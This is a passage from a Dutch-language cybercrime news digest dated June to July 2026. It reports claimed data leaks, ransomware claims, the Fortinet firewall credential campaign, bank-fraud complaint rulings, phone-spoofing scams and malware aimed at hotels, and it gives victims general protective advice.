De buitgemaakte data zou volgens de listing diverse persoonlijke en accountgerelateerde informatie omvatten. Dit betreft onder meer e-mailadressen, voornamen en achternamen van gebruikers, evenals vaste en mobiele telefoonnummers. Daarnaast zouden functies of rollen van gebruikers, hun accountstatus en moderatorstatus, en geblokkeerde URL’s deel uitmaken van de gelekte informatie. Ook tijdstempels van de laatste login, de aanmaakdatum van het account en validatiegegevens zouden in de database aanwezig zijn.

Het is belangrijk op te merken dat de claims van de dreigingsactor niet onafhankelijk zijn geverifieerd. Desondanks zijn dergelijke gebruikersdatabases bijzonder waardevol voor cybercriminelen. Ze kunnen worden ingezet voor het uitvoeren van gerichte phishingcampagnes, waarbij aanvallers proberen gevoelige informatie te ontfutselen via misleidende berichten. Bovendien kunnen de gelekte gegevens worden gebruikt voor aanvallen waarbij hergebruikte wachtwoorden op andere online diensten worden geprobeerd, wat leidt tot potentiële accountovernames.

Gebruikers van het platform Agenda.be worden daarom aangeraden waakzaam te zijn voor verdachte e-mails, sms-berichten of andere communicatie die afkomstig lijkt van Agenda.be of gerelateerde diensten. Het wordt tevens sterk aanbevolen om de wachtwoorden van hun accounts op Agenda.be en eventuele andere diensten waar hetzelfde wachtwoord mogelijk is gebruikt, onmiddellijk te wijzigen.

 

Bron: Cybercrimeinfo

23 juni 2026 | Russische cyberaanval treft 270 Belgische bedrijven via lek bij Fortinet

Een grootschalige Russische cyberaanval heeft begin dit jaar minstens 270 Belgische bedrijven en organisaties getroffen, zo blijkt uit een analyse van het Vlaamse cyberveiligheidsbedrijf Secutec. De aanval maakte misbruik van een datalek bij cybersecuritygigant Fortinet in februari 2026. Dit lek bij een van de grootste cybersecuritybedrijven ter wereld stelde cybercriminelen in staat om inloggegevens te bemachtigen van IT-partners van Fortinet. Deze partners beheren de firewalls, de 'digitale veiligheidsmuren', van duizenden klanten wereldwijd, waardoor de aanvallers indirect toegang kregen tot een breed scala aan netwerken.

Secutec, gevestigd in Aartselaar, slaagde erin de cybercriminelen zelf te hacken. Hierdoor kreeg het bedrijf inzicht in de volledige operatie en toegang tot een lijst van 70.000 getroffen bedrijven, inclusief gebruikersnamen en wachtwoorden. Van deze lijst zijn 270 organisaties in België getroffen, voornamelijk kleinere bedrijven en kmo's, waaronder transportbedrijven, advocatenkantoren, scholengroepen en zelfs overheidsinstanties.

Volgens Geert Baudewijns, CEO van Secutec, is de oorzaak van de aanhoudende kwetsbaarheid vaak gebrekkige cyberbeveiliging. Hij stelt dat bij ruim 100 van de getroffen Belgische bedrijven de inloggegevens nog steeds online te grabbel liggen. Secutec heeft 1.300 gevallen geïdentificeerd van firewalls die toegankelijk zijn met de standaard gebruikersnaam 'admin' en wachtwoord 'admin'. Baudewijns benadrukt dat dit onacceptabel is.

De operatie wordt gelinkt aan een Russisch hackerscollectief, dat volgens Baudewijns opvallend sterk georganiseerd en georkestreerd is, en van een ongeziene schaal. Hij merkt een duidelijke verschuiving op in de werkwijze van cybercriminelen, de focus verschuift van het versleutelen van data naar het stelen en verhandelen van toegang en gegevens. In België zijn op minstens 45 systemen al nieuwe accounts aangemaakt door de hackers, wat duidt op de voorbereiding van toegang voor verkoop op het dark web. Wereldwijd is al sprake van grootschalige data-exfiltratie bij verschillende organisaties.

Secutec heeft het Centrum voor Cybersecurity België (CCB) en diverse Europese nationale CERT's (Computer Emergency Response Teams) op de hoogte gebracht. Het bedrijf roept organisaties die Fortinet-producten gebruiken op om dringend maatregelen te nemen. Baudewijns waarschuwt dat deze grootschalige ketenaanvallen, die de kwetsbaarheid van het IT-dienstverleningsecosysteem illustreren, de komende jaren alleen maar zullen toenemen.

 

Bron: Secutec

23 juni 2026 | Europese vastgoed CRM Whise.eu mogelijk getroffen door datalek van 40 miljoen records

Op het darkweb is een claim verschenen van de dreigingsactor ChimeraZ, die beweert een database te hebben gelekt van Whise, het Belgische CRM-systeem voor de vastgoedsector. Whise is marktleider in België en ook actief in Frankrijk, met enkele duizenden makelaarskantoren als klant. De gelekte data zou bestaan uit 40,85 miljoen regels, wat neerkomt op ongeveer 15,8 GB aan JSON-bestanden. Dit omvat naar verluidt 37,7 miljoen e-mailverzendlogboeken en meer dan 3 miljoen contactgegevens.

De gelekte informatie zou namen, e-mailadressen, telefoonnummers en mobiele nummers bevatten. Daarnaast zijn er IP adressen en tijdstempels opgenomen, evenals criteria voor het zoeken naar onroerend goed, zoals budget en locatievoorkeuren. Ook marketing-consent flags zouden deel uitmaken van de dataset. De claim is op 22 juni 2026 waargenomen.

De potentiële impact van dit datalek wordt als hoog ingeschat, voornamelijk vanwege de enorme schaal. Tientallen miljoenen logboeken van e-mailactiviteiten en miljoenen contactgegevens van vastgoedleads en cliënten in heel Europa zijn mogelijk blootgesteld. Hoewel er geen wachtwoorden of financiële accountgegevens in de gelekte set zouden zitten, kan de combinatie van persoonlijke gegevens grootschalige phishingaanvallen, vastgoed- en verhuurscams, spam en profilering ondersteunen. Deze scams kunnen specifiek worden toegespitst op personen die actief op zoek zijn naar onroerend goed.

Aangezien IP adressen en contactgegevens persoonsgegevens zijn onder de Europese regelgeving, zou dit een aanzienlijke blootstelling zijn met relevante implicaties voor de Algemene Verordening Gegevensbescherming (AVG).

De status van de claim is momenteel onbevestigd. Sample JSON records en een downloadlink zijn op een forum achter een betaalmuur geplaatst, maar deze zijn niet onafhankelijk geverifieerd. Whise.eu heeft tot op heden geen publieke mededeling gedaan over het vermeende datalek.

 

Bron: Cybercrimeinfo

23 juni 2026 | Rabobank-klant krijgt 48.000 euro schade door bankhelpdeskfraude niet vergoed

Een klant van de Rabobank die slachtoffer werd van bankhelpdeskfraude, krijgt de geleden schade van 48.000 euro niet vergoed. Dit is de uitkomst van een oordeel van het Nederlandse financiële klachteninstituut Kifid. De fraude vond plaats eind 2024, toen de klant werd benaderd door een oplichter die zich voordeed als medewerker van de Rabobank. De oplichter wist het slachtoffer te bewegen om bedragen over te maken van zowel een privé- als een zakelijke betaalrekening bij de bank naar een Duitse betaalrekening die eigendom was van de oplichter.

Het detectiesysteem van de Rabobank registreerde meerdere betaalopdrachten die de klant vanaf beide rekeningen uitvoerde, wat resulteerde in het blokkeren van zowel de privé- als de zakelijke betaalrekening. Tijdens het contact met de bank over de geblokkeerde rekeningen, legde de klant, op instructie van de oplichter, herhaaldelijk onware verklaringen af over het doel van de betalingen. Zo beweerde de klant dat het geld bestemd was voor de overname en renovatie van een biergarten in Duitsland, wat niet de waarheid was.

Volgens het Kifid, dat zich baseert op opgenomen telefoongesprekken, werd de klant tijdens de gesprekken met de bank meerdere keren kritisch bevraagd en gewaarschuwd voor mogelijke fraude. Echter, op basis van de verklaringen van de klant over de transacties, heeft de bank de betaalrekening uiteindelijk weer vrijgegeven. Het klachteninstituut stelt dat de bank niet kan worden verweten dat zij de betaalrekening opnieuw heeft vrijgegeven, aangezien de consument verklaarde dat er niets mis was.

De klant vorderde dat de bank de geleden schade zou vergoeden onder het coulancekader voor slachtoffers van bankhelpdeskfraude. De Rabobank besloot een bedrag van 4.500 euro, afkomstig van de eerste transactie, te vergoeden. Een dag later maakte de klant echter opnieuw een bedrag van 49.500 euro over, waarvan 1.400 euro retour kwam. De klant eiste daarop dat de Rabobank het resterende bedrag van 48.100 euro zou vergoeden. De bank weigerde dit en kreeg hierin gelijk van het Kifid.

Het klachteninstituut motiveerde zijn beslissing door te stellen dat de consument, hoewel onbedoeld, zelf een cruciale rol heeft gespeeld bij het ontstaan van de schade door onware verklaringen aan de bank af te leggen. Het oordeel benadrukt dat de bank mocht uitgaan van de verklaringen van de klant en dat deze handelwijze de eigen verantwoordelijkheid van de consument is, waarvan de gevolgen voor diens risico dienen te worden gelaten.

 

Bron: Kifid

23 juni 2026 | Werkwijze hackers Fortinet-firewalls gelekt, honderden Nederlandse systemen getroffen

Hackers die eerder inloggegevens van tienduizenden Fortinet-firewalls en VPN-gateways wisten te bemachtigen, hebben hun werkwijze en tools via een open directory gelekt. Dit is gemeld door cybersecuritybedrijf CloudSEK. In Nederland zouden ongeveer driehonderd Fortinet-firewalls zijn getroffen door deze aanval. Fortinet heeft laten weten dat er geen misbruik is gemaakt van een nieuwe kwetsbaarheid, maar van inloggegevens die zijn gestolen via bekende kwetsbaarheden waarvoor eind vorig jaar en begin dit jaar updates zijn verschenen.

Volgens de Britse beveiligingsonderzoeker Kevin Beaumont is de verklaring van Fortinet echter niet het volledige verhaal. Hij vermoedt dat ongepatchte kwetsbaarheden of eerder toegevoegde admin-accounts als backdoors mogelijk een rol hebben gespeeld bij de initiële toegang. De aanvallers wisten de configuratie van de Fortinet-apparaten te dumpen en vervolgens de wachtwoordhashes te kraken met behulp van een GPU-cluster. Vervolgens werden brute-force aanvallen uitgevoerd tegen firewalls en gateways die een zwakke wachtwoordhygiëne hadden en waarvoor geen multifactorauthenticatie (MFA) was ingeschakeld.

De aanvallers begingen een grote fout, door hun tools, scripts en werkwijze via een open directory toegankelijk te maken. Hierdoor werd duidelijk dat zij eerst zochten naar online toegankelijke admin-interfaces van Fortinet-firewalls. Daarna probeerden zij in te loggen met eerder gestolen wachtwoorden. Eenmaal binnen haalden de aanvallers hashes van VPN-gebruikers binnen, die vervolgens offline werden gekraakt.

Beaumont waarschuwt dat de gekraakte VPN-inloggegevens verdere aanvallen mogelijk maken. Hij merkt op dat aanvallers bij getroffen organisaties nieuwe admin-accounts aanmaakten, nieuwe firewallregels configureerden om SSH en RDP vanaf specifieke IP-adressen toe te staan, en inlogden op IPsec VPN-tunnels. De aanvallers richtten zich specifiek op telecombedrijven en managed service providers (MSP's) die klantconnectiviteit via Fortigate-firewalls beheren, om zo toegang te krijgen tot interne netwerken van deze klanten. Uit de open directory van de aanvallers bleek dat zij toegang hadden tot interne Active Directory-omgevingen van een groot aantal organisaties.

Als advies raadt Beaumont getroffen organisaties aan hun Fortinet-apparaten tijdelijk offline te halen, volledig opnieuw op te bouwen, alle admin-accounts te verwijderen en nieuwe accounts aan te maken, waarbij voor elk account MFA is ingeschakeld. Ook moeten de laatste firmware geïnstalleerd zijn en alle firewallregels geïnspecteerd worden. Bovendien adviseert de onderzoeker om alle IPsec site-to-site VPN-tunnelkeys of certificaten aan beide kanten te vervangen.

 

Bron: Fortinet | Bron 2: cloudsek.com

23 juni 2026 | Meer dan de helft van Belgische bedrijven lijdt binnen 24 uur omzetverlies na cyberaanval

Uit recent onderzoek blijkt dat 56 procent van de Belgische bedrijven al binnen 24 uur na een cyberaanval omzetverlies lijdt. De gevolgen zijn voor achttien procent zelfs binnen enkele uren merkbaar. Deze bevindingen komen naar voren uit een nieuw rapport van HarfangLab, gebaseerd op een onderzoek uitgevoerd door Sapio Research onder 750 bedrijfsleiders in zes Europese landen, waaronder België. Hoewel de urgentie rond cyberweerbaarheid toeneemt en investeringen in kunstmatige intelligentie (AI) stijgen, blijft de verantwoordelijkheid voor cyberveiligheid vaak versnipperd binnen organisaties.

Belgische bestuurders beschouwen cyberaanvallen als de grootste bedreiging voor hun bedrijfscontinuïteit, zelfs nog vóór geopolitieke onzekerheid, personeelstekorten en AI-gerelateerde risico's. Meer dan driekwart van de bedrijven verwacht aanzienlijke impact bij een cyberincident. De financiële schade is potentieel groot, bij een verstoring van kritieke processen van slechts één dag verwacht 35 procent van de leiders een omzetverlies van minimaal zestien procent per dag, terwijl acht procent zelfs op meer dan 25 procent verlies rekent. Toch duurt het gemiddeld meer dan vijf dagen om volledig te herstellen van een incident, wat een aanzienlijke kloof tussen de verwachte schade en de daadwerkelijke hersteltijd blootlegt. Een eerder dreigingsrapport van Inetum toonde al aan dat België tot de top tien behoort van meest geviseerde landen voor cyberaanvallen wereldwijd.

Ondanks het groeiende besef van de risico's, is de verantwoordelijkheid voor cyberveiligheid vaak diffuus. Slechts een kwart van de organisaties legt deze bij de CEO, terwijl 36 procent de CISO aanwijst en 21 procent de CIO. Ook na een incident blijft de verantwoordelijkheid onduidelijk, wat een snelle en effectieve respons op cyberdreigingen belemmert. Het rapport van HarfangLab en Sapio Research benadrukt het belang van duidelijk eigenaarschap, ondersteund door interne expertise en betrouwbare externe partners, om de cyberweerbaarheid te vergroten.

Verder blijkt dat Belgische bedrijven volop investeren in AI, voornamelijk gericht op productiviteit en efficiëntie. Echter, slechts zestien procent van de AI-investeringen is primair gericht op cybersecurity. Minder dan de helft hanteert verplichte veiligheidsbeoordelingen voor nieuwe AI tools, en slechts 37 procent beschikt over formele AI-richtlijnen. Dit wijst op een groeiende disbalans, de snelheid van AI-adoptie overtreft het tempo waarmee governance- en beveiligingsmaatregelen worden ingericht.

Tot slot vergroot strengere Europese wetgeving de druk op bestuurders. 73 procent van de Belgische topbestuurders is van mening dat regelgeving de verantwoordelijkheid op bestuursniveau vergroot. Tegelijkertijd maakt 60 procent zich zorgen over persoonlijke aansprakelijkheid na een incident. Veel organisaties worstelen met het begrijpen en implementeren van deze regelgeving; 68 procent ondervindt moeite met de interpretatie ervan, en 62 procent vindt het lastig om het tempo van nieuwe regels te volgen.

 

Bron: HarfangLab en Sapio Research | Bron 2: itdaily.com

23 juni 2026 | Ransomwaregroep Aurora claimt aanval op Nederlandse aannemer NTP

De ransomwaregroep Aurora heeft op 22 juni 2026 het Nederlandse aannemersbedrijf NTP B.V. toegevoegd aan haar darkweb-lekpagina. NTP, dat opereert onder de namen NTP Infra en NTP Groep, is een belangrijke speler in de grond-, weg- en waterbouwsector. Het hoofdkantoor van het bedrijf is gevestigd in Hattem, Gelderland, met aanvullende vestigingen in Enschede en Zevenaar.

NTP B.V. is gespecialiseerd in de aanleg van wegen en rioleringen, bodemsanering en grondwaterbeheer. Het bedrijf telt ongeveer 230 medewerkers. Aurora claimt de complete bedrijfsserver van NTP te hebben buitgemaakt. Volgens de ransomwaregroep hebben zij toegang tot meer dan tien jaar aan bedrijfsvoering gerelateerde gegevens.

De gestolen informatie zou onder meer persoonlijke personeelsdossiers, een volledige export van het HR- en salarissysteem, netwerkconfiguraties, projectoffertes en de financiële administratie omvatten. Deze beweringen zijn door de aanvallers op hun lekpagina gepubliceerd.

Het aannemersbedrijf NTP heeft de vermeende aanval tot op heden niet bevestigd. De claims van de ransomwaregroep Aurora zijn bovendien niet onafhankelijk geverifieerd. Dit betekent dat de omvang en de aard van een eventueel datalek nog onduidelijk zijn.

 

Bron: Cybercrimeinfo

23 juni 2026 | Vermeende klantendatabase Thuisbezorgd.nl te koop op cybercrimeforum

Op een ondergronds cybercrimeforum is een dataset aangeboden die naar verluidt afkomstig is van de Nederlandse maaltijdbezorgdienst Thuisbezorgd.nl. De dreigingsactor die de gegevens adverteert, claimt dat het bestand meer dan 250.000 klantrecords bevat.

Volgens de verkoper omvat de dataset diverse persoonlijke gegevens van klanten, waaronder namen, e-mailadressen, telefoonnummers, adressen, postcodes en account-identificatiegegevens. Een voorbeeld van de dataset, gedeeld door de actor, zou gestructureerde klantgegevens bevatten.

Het is echter cruciaal te benadrukken dat er momenteel geen onafhankelijke bevestiging is van de echtheid van de aangeboden gegevens, noch van de daadwerkelijke herkomst van Thuisbezorgd.nl. Zowel de authenticiteit als de omvang van de dataset blijven onbevestigd en worden nog nader onderzocht.

 

Bron: Cybercrimeinfo

24 juni 2026 | Brussel's waterbedrijf Vivaqua ziet toename cyberaanvallen

Het Brusselse waterbedrijf Vivaqua heeft te maken met een toenemend aantal cyberaanvallen en phishingpogingen. Volgens het beheersverslag over 2025 en een verklaring van woordvoerster Saar Vanderplaetsen, ervaart de organisatie een significante stijging van cyberdreigingen. Deze toename wordt mede toegeschreven aan de instabiele geopolitieke context. De nabijheid van internationale instellingen zoals de NAVO en de Europese Commissie in Brussel, gecombineerd met de levering van essentiële diensten aan de bevolking, maakt Vivaqua een aantrekkelijker doelwit dan andere openbare operatoren.

Vorig jaar werd de website van Vivaqua driemaal getroffen door Distributed Denial-of-Service (DDoS)-aanvallen. Deze aanvallen, tweemaal in augustus en eenmaal in november, hadden als doel de website plat te leggen door middel van overbelasting. De bron van deze aanvallen wordt door Vivaqua beschreven als een externe partij, mogelijk een staatsgeleid cyberteam. De impact van deze DDoS aanvallen bleef echter beperkt; de website was in totaal slechts vier uur ontoegankelijk.

Naast de DDoS aanvallen ontvangt Vivaqua dagelijks meldingen van diverse cybersecurityincidenten, waaronder phishingpogingen en de detectie van virussen in bestanden. Deze worden consistent tegengehouden door de aanwezige afweersystemen van het waterbedrijf. De cyberdreiging blijft ook in 2026 onverminderd aanwezig, met dagelijkse phishingpogingen en gerelateerde aanvallen.

Als reactie op de escalerende dreiging heeft Vivaqua haar cybersecuritymaatregelen verder versterkt. Dit omvat onder meer het proactief identificeren van potentiële bedreigingen om de veiligheid en continuïteit van de essentiële dienstverlening te waarborgen. De organisatie benadrukt het belang van voortdurende waakzaamheid en investeringen in cyberbeveiliging om de risico's te mitigeren.

 

Bron: BRUZZ

24 juni 2026 | Belgisch transportbedrijf Fast Transit Line doelwit van Nova ransomware

De ransomwaregroep Nova heeft een claim gepubliceerd waarin zij beweert een cyberaanval te hebben uitgevoerd op Fast Transit Line, een transport- en logistiekbedrijf gevestigd in België. Volgens de claim van de dreigingsactor is bij deze aanval 200 GB aan data buitgemaakt. De ransomwaregroep heeft tevens aangegeven van plan te zijn de gestolen data binnen 11 tot 12 dagen openbaar te maken, mocht Fast Transit Line niet aan hun eisen voldoen.

De claim, die op 23 juni 2026 werd gerapporteerd, betreft het bedrijf ftl.be. De aard van de gecompromitteerde data en de specifieke impact op de bedrijfsvoering van Fast Transit Line zijn op dit moment niet verder gespecificeerd in de claim van Nova.

 

Bron: Cybercrimeinfo

24 juni 2026 | Vermeende dataset van schoolboekenleverancier Iddink met 2,2 miljoen records te koop aangeboden

Op het darkweb is een advertentie verschenen waarin een actor claimt een omvangrijke database van Iddink te koop aan te bieden. Iddink is een bekende leverancier van schoolboeken en digitale leermaterialen, actief in Nederland, België en Spanje. Volgens de advertentie zou de vermeende dataset 2.225.857 records bevatten.

De geclaimde blootgestelde gegevens zijn divers en omvatten onder meer namen, e-mailadressen, telefoonnummers, geboortedata, woonadressen, postcodes, IBAN- en BIC-velden. Daarnaast zouden er contactgegevens per leerling, velden gerelateerd aan het Burgerservicenummer (BSN) en records betreffende scholen en studenten deel uitmaken van de database.

De actor noemt Iddink specifiek als doelwit van de datadiefstal en vermeldt Spanje, Nederland en België als de landen waaruit de gegevens afkomstig zouden zijn. De sector waartoe Iddink behoort, en daarmee de getroffen sector, is het onderwijs.

Het is belangrijk te benadrukken dat de claim van de darkweb actor niet onafhankelijk is geverifieerd. Gebruikers die mogelijk getroffen zijn door dit vermeende datalek, worden geadviseerd extra alert te zijn op mogelijke phishingpogingen en misbruik van hun persoonlijke gegevens. In 2024 werd Iddink ook al geconfronteerd met datalekken.

 

Bron: Cybercrimeinfo

24 juni 2026 | Vermeend datalek bij Belgische marktplaats 2ememain.be met 300.000 gebruikersrecords

Een recente bevinding op het darkweb duidt op een vermeend datalek bij 2ememain.be, een prominente Belgische online marktplaats voor tweedehands goederen. Een onbekende dreigingsactor claimt toegang te hebben verkregen tot een dataset die ongeveer 300.000 gebruikersrecords zou bevatten. Deze claim is op dit moment nog niet onafhankelijk geverifieerd.

De geclaimde dataset omvat gevoelige persoonlijke informatie van gebruikers. Specifiek worden klant ID's, volledige voor- en achternamen, gebruikersnamen, e-mailadressen en telefoonnummers genoemd. Daarnaast zouden ook geboortedata, informatie over geslacht, identificatie- en registratiegegevens, en taalvoorkeuren deel uitmaken van het gestolen materiaal.

Gezien de aard van de geclaimde gegevens, worden gebruikers van 2ememain.be geadviseerd uiterst alert te zijn op mogelijke kwaadwillende activiteiten. Dit omvat een verhoogd risico op phishing aanvallen, waarbij criminelen proberen inloggegevens of andere gevoelige informatie te ontfutselen. Ook accountovername, waarbij aanvallers toegang krijgen tot gebruikersaccounts, en identiteitsfraude behoren tot de potentiële gevolgen. Ten slotte kan de gelekte informatie misbruikt worden voor social engineering, waarbij aanvallers persoonlijke details gebruiken om vertrouwen te winnen en slachtoffers te manipuleren. Gebruikers wordt aangeraden om sterke, unieke wachtwoorden te gebruiken en twee-factor authenticatie in te schakelen waar mogelijk.

 

Bron: Cybercrimeinfo

24 juni 2026 | Oude dataset van LiteBit uit 2017 met bijna 280.000 records opnieuw te koop aangeboden

Een onbekende actor biedt op het darkweb een database aan die beweert toe te behoren aan LiteBit, het Nederlandse platform voor cryptovaluta. De dataset zou 279.642 records bevatten met informatie die dateert uit 2017. Dit is opmerkelijk, aangezien LiteBit in 2017 daadwerkelijk tweemaal het slachtoffer was van datalekken.

De geclaimde gegevens zijn uitgebreid en omvatten persoonlijke en financiële informatie. Specifiek worden account ID's, volledige namen, e-mailadressen, mobiele nummers, IBAN velden, geslacht, geboortedatum, IP-adressen, straatadressen, postcodes en gegevens over stad en land genoemd.

Het gaat naar alle waarschijnlijkheid om gerecycleerde gegevens uit een van de eerdere incidenten en niet om een nieuw datalek. De authenticiteit van de claim is op dit moment nog niet onafhankelijk geverifieerd.

Gebruikers die destijds een account hadden bij LiteBit en potentieel getroffen zijn door de datalekken in 2017, wordt geadviseerd extra alert te blijven. Er bestaat een verhoogd risico op phishingpogingen, waarbij aanvallers de gelekte gegevens kunnen gebruiken om geloofwaardige frauduleuze berichten op te stellen. Daarnaast moeten gebruikers waakzaam zijn voor elk ander misbruik van deze oudere persoonsgegevens, zoals identiteitsfraude.

 

Bron: Cybercrimeinfo

25 juni 2026 | KNAB-klanten doelwit van telefoonspoofing en QR-codescam

Klanten van de Nederlandse bank KNAB worden momenteel geconfronteerd met een geavanceerde vorm van oplichting waarbij telefoonspoofing wordt ingezet. Oplichters doen zich voor als bankmedewerkers en proberen slachtoffers te overtuigen een QR-code te scannen. De Fraudehelpdesk heeft hiervoor vandaag een waarschuwing uitgegeven.

De oplichters benaderen hun slachtoffers telefonisch en beweren dat er een verdachte inlogpoging op hun rekening is waargenomen. Bijzonder misleidend is het gebruik van telefoonspoofing, waardoor het daadwerkelijke telefoonnummer van KNAB in het display van de telefoon van het slachtoffer verschijnt. Dit geeft de indruk dat het om een legitiem telefoongesprek met de bank gaat, wat het verhaal van de oplichters zeer overtuigend maakt.

Tijdens het gesprek wordt slachtoffers gevraagd om voor 'verificatie' naar een specifieke website te navigeren. Op deze website wordt vervolgens verzocht een QR-code te scannen. Volgens de Fraudehelpdesk kan het scannen van deze QR-code potentiële toegang verlenen tot de apparaten van het slachtoffer of zelfs direct tot hun bankrekening.

De Fraudehelpdesk benadrukt dat deze oplichtingsmethode extra gevaarlijk is, omdat de criminelen soms beschikken over persoonlijke informatie van de slachtoffers. Deze gegevens kunnen afkomstig zijn van eerdere datalekken, waardoor het verhaal van de oplichters nog geloofwaardiger overkomt.

Om zichzelf te beschermen, adviseert de Fraudehelpdesk om direct op te hangen wanneer men gebeld wordt door iemand die zich voordoet als medewerker van KNAB. Vervolgens dient het slachtoffer zelf het officiële telefoonnummer van de bank op te zoeken en contact op te nemen om na te vragen of de bank inderdaad contact heeft proberen op te nemen. Daarnaast wordt dringend afgeraden om websites te bezoeken die door de oplichters worden genoemd of om QR-codes te scannen die in dergelijke situaties worden aangeboden.

 

Bron: Fraudehelpdesk

26 juni 2026 | Onzekerheid over aantal Nederlandse slachtoffers hack van Canvas

Het is momenteel onbekend hoeveel Nederlandse studenten zijn getroffen door de recente hack bij onderwijsplatform Canvas en welke specifieke gegevens van hen zijn buitgemaakt. Dit heeft minister Letschert van Onderwijs verklaard in antwoord op Kamervragen. De criminele groepering ShinyHunters claimde eerder de hand te hebben gelegd op gegevens van 275 miljoen Canvas-gebruikers wereldwijd. ShinyHunters is dezelfde groep die eerder de data van meer dan zes miljoen Odido-gebruikers wist te stelen.

Canvas is een veelgebruikt webgebaseerd Learning Management System (LMS) dat door onderwijsinstellingen wordt ingezet om lesmateriaal aan te bieden aan studenten. Via het platform kunnen studenten onder meer werk indienen, berichten uitwisselen en samenwerken. Volgens leverancier Instructure maken wereldwijd zevenduizend onderwijsinstellingen gebruik van Canvas, met meer dan tweehonderd miljoen gebruikers. Ook Nederlandse universiteiten en andere onderwijsinstellingen gebruiken het platform.

Na de datadiefstal dreigden de cybercriminelen de gestolen informatie op internet te publiceren, tenzij er losgeld zou worden betaald. Instructure heeft vervolgens laten weten dat het een overeenkomst met de criminelen had gesloten om publicatie van de data te voorkomen. Het bedrijf stelde 'shred logs' van de groep te hebben ontvangen, wat zou bewijzen dat de gegevens zijn vernietigd. Beveiligingsexperts hebben echter hun twijfels geuit over de authenticiteit van deze claim.

Het datalek leidde tot Kamervragen van D66, die onder andere wilde weten hoeveel Nederlandse studenten zijn getroffen. Minister Letschert antwoordde hierop: "De MBO-raad, UNL en VH hebben mij laten weten dat op dit moment alleen bekend is welke instellingen getroffen zijn. Zij geven aan dat Instructure, de leverancier van Canvas, nog niet heeft aangegeven welke gegevens precies zijn buitgemaakt." De minister voegde eraan toe dat onderwijsinstellingen in contact staan met Instructure om hier meer duidelijkheid over te krijgen. Dit betekent dat er op dit moment nog geen goede schatting kan worden gemaakt van het aantal getroffen studenten, docenten en onderwijsmedewerkers.

De Onderwijsminister liet verder weten dat Nederlandse universiteiten en andere onderwijsinstellingen hebben aangegeven niet direct benaderd te zijn door ShinyHunters. Over de betaling van losgeld door Instructure is geen duidelijkheid. "Instructure heeft gemeld een akkoord te hebben gesloten met de hackers en dat de buitgemaakte gegevens zouden zijn vernietigd. Instructure zegt hiervan bewijs te hebben ontvangen. Of er losgeld is betaald door Instructure is mij en de instellingen niet bekend. Het is aan ieder bedrijf om een eigen afweging te maken. Het dringende advies vanuit de overheid is om geen losgeld te betalen," aldus de minister.

 

Bron: Tweede Kamer

27 juni 2026 | Nederlandse hotels doelwit van gerichte aanvallen met malware

Hotels in Europa, waaronder ook diverse in Nederland, zijn het doelwit geworden van gerichte aanvallen met malware. Microsoft meldt dat medewerkers worden verleid om malafide zip-bestanden te downloaden. De methode begint met een phishingmail die aan het hotel wordt gericht. Deze e-mails doen zich voor als klachten van gasten, meldingen over bedwantsen, of vragen naar de beschikbaarheid van hotelkamers. De phishingmail bevat een link die leidt naar een zip-bestand.

Binnen dit zip-bestand bevindt zich een malafide snelkoppeling, die slim is vermomd als een afbeelding. Deze bestanden hebben namen die beginnen met 'IMG' of 'PHOTO', gevolgd door een getal en eindigend op de .lnk-extensie. Doordat Windows standaard de bestandsextensies niet toont, kunnen medewerkers gemakkelijk misleid worden en denken dat zij een afbeelding openen. In werkelijkheid is het een snelkoppeling die, eenmaal geopend, malware downloadt en uitvoert. Deze malware geeft de aanvallers vervolgens controle over het betreffende systeem.

Microsoft heeft geen verdere details verstrekt over de exacte doelen van de aanvallers, wat zij precies met de geïnfecteerde systemen doen, of welke specifieke hotels het doelwit waren. Dit incident volgt op eerdere berichten van begin deze maand, toen bekend werd dat de Nederlandse hotelsector te kampen had met een omvangrijk datalek. Bij dat eerdere incident werden zeker honderd hotels getroffen en kwamen persoonlijke gegevens van duizenden gasten in verkeerde handen. De buitgemaakte gegevens werden later misbruikt voor phishingaanvallen op hotelgasten. De huidige aanvalsmethode toont een voortdurende dreiging voor de sector.

 

Bron: Microsoft

01 juli 2026 | Klant van Rabobank krijgt schade door phishing via Marktplaats niet vergoed

Een klant van de Rabobank die het slachtoffer werd van een geavanceerde phishingaanval via Marktplaats, zal de geleden schade van vierduizend euro niet vergoed krijgen. Het Nederlandse financiële klachteninstituut Kifid heeft geoordeeld dat het slachtoffer grof nalatig heeft gehandeld. Deze uitspraak benadrukt de verantwoordelijkheid van de gebruiker bij het opvolgen van de veiligheidsinstructies van de bank.

De phishingaanval begon toen de klant een product aanbood op Marktplaats. Een oplichter, die zich voordeed als geïnteresseerde koper, benaderde het slachtoffer en vroeg haar op een link te klikken. Deze link leidde naar een zorgvuldig nagemaakte phishingsite, waar de klant van de Rabobank haar bankgegevens invoerde.

Vervolgens werd de klant gevraagd om handelingen te verrichten met haar betaalpas, pincode en de Rabo Scanner. Deze stappen culmineerden in het invoeren van een signeercode, waardoor een nieuwe mobiele telefoon aan de betaalrekening van de klant van de Rabobank werd gekoppeld. Met deze zojuist geregistreerde telefoon kreeg de oplichter onbeperkte toegang tot de online bankomgeving van het slachtoffer. Hierdoor konden de cybercriminelen zelfstandig betalingsopdrachten uitvoeren, waaronder het plaatsen en betalen van diverse bestellingen, met een totale schade van vierduizend euro.

Het Kifid stelde vast dat de acties van de klant van de Rabobank in strijd waren met de veiligheidsinstructies van de bank. Tijdens de uitvoering van de transacties op de Rabo Scanner werd expliciet en ondubbelzinnig aangegeven dat een toestel voor online bankieren werd geregistreerd. Bovendien bevatte de melding een gerichte waarschuwing dat de gebruiker moest stoppen als deze registratie niet door henzelf was geïnitieerd.

Naast de waarschuwing op de Rabo Scanner ontving de klant ook een bericht via sms ter bevestiging van de registratie van de nieuwe telefoon voor haar betaalrekening. Volgens het klachteninstituut had dit bericht de klant moeten alarmeren en onmiddellijk moeten aanzetten tot actie, zoals het blokkeren van de rekening en het contacteren van de bank. De klant ondernam echter pas stappen nadat zij de frauduleuze afschrijvingen op haar rekening constateerde.

De klant verdedigde zich door te stellen dat zij op dat moment bezig was met het opnieuw activeren van haar eigen Rabo App en de melding daarom niet als verdacht had herkend. Het Kifid vond deze redenatie niet steekhoudend, aangezien de administratie van de bank geen herinstallatie van de Rabo App liet zien. Het instituut concludeerde dat de klant meerdere duidelijke signalen heeft genegeerd die erop wezen dat er een handeling werd verricht die niet overeenkwam met haar bedoelingen. Door deze signalen te negeren en de handeling toch te bevestigen met de signeercode van de Rabo Scanner, heeft de consument grof nalatig gehandeld bij het naleven van de veiligheidsregels. De vordering van het slachtoffer werd op grond hiervan afgewezen.

 

Bron: Rabobank

01 juli 2026 | Explosieve stijging van frauduleuze transacties in Nederlands betalingsverkeer

